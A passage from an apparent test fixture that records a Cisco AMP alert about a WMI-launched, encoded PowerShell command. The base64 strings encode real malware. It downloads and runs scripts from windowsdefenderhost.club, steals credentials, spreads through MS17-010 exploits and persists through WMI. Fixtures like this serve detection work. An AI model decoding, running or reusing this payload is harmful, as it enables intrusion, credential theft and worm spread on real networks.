ZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}",
+                "id": "6880683125978957000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "bp_data": {
+                        "severity": "medium",
+                        "start_ts": 1610640884,
+                        "remediated": false,
+                        "detection": "apde:20190517123456",
+                        "silent": false,
+                        "normalized": {
+                            "name": "wmiprvse launched encoded powershell command",
+                            "observables": {
+                                "file": {
+                                    "name": [
+                                        "powershell.exe",
+                                        "wmiprvse.exe"
+                                    ],
+                                    "path": [
+                                        "c:\\windows\\system32\\windowspowershell\\v1.0",
+                                        "c:\\windows\\system32\\wbem"
+                                    ]
+                                }
+                            }
+                        },
+                        "type": "activity",
+                        "observables": {
+                            "file": [
+                                {
+                                    "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
+                                    "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
+                                    "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
+                                    "size": 443392,
+                                    "type_id": 1,
+                                    "name": "powershell.exe",
+                                    "properties": {
+                                        "file_version": "10.0.14409.1005",
+                                        "copyright": "© Microsoft Corporation. All rights reserved.",
+                                        "product": "Microsoft® Windows® Operating System",
+                                        "product_version": "10.0.14409.1005"
+                                    },
+                                    "md5": "a575a7610e5f003cc36df39e07c4ba7d"
+                                },
+                                {
+                                    "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
+                                    "path": "C:\\Windows\\System32\\wbem",
+                                    "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
+                                    "size": 425984,
+                                    "type_id": 1,
+                                    "name": "WmiPrvSE.exe",
+                                    "properties": {
+                                        "file_version": "10.0.14409.1005",
+                                        "copyright": "© Microsoft Corporation. All rights reserved.",
+                                        "product": "Microsoft® Windows® Operating System",
+                                        "product_version": "10.0.14409.1005"
+                                    },
+                                    "md5": "d683c112190f4b4c6d477d693ee88e35"
+                                }
+                            ]
+                        },
+                        "end_ts": 1610640884,
+                        "engine": "apde",
+                        "audit": false,
+                        "name": "WMIPRVSE Launched Encoded Powershell Command",
+                        "tactics": [
+                            "TA0002",
+                            "TA0005",
+                            "TA0008"
+                        ],
+                        "details": {
+                            "eng_ver": "0.9.0.104",
+                            "schema": "endpoint",
+                            "sig_rev": 5,
+                            "matched_activity": {
+                                "limited": false,
+                                "matched": 1,
+                                "events": [
+                                    {
+                                        "process:start": {
+                                            "app": "powershell.exe",
+                                            "parent_app": "WmiPrvSE.exe",
+                                            "parent_user": "SYSTEM",
+                                            "parent_user_sid": "010100000000000512000000",
+                                            "pid": 10724,
+                                            "args": [
+                                                "powershell.exe",
+                                                "-NoP",
+                                                "-NonI",
+                                                "-W",
+                                                "Hidden",
+                                                "-E",
+                                                "JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAb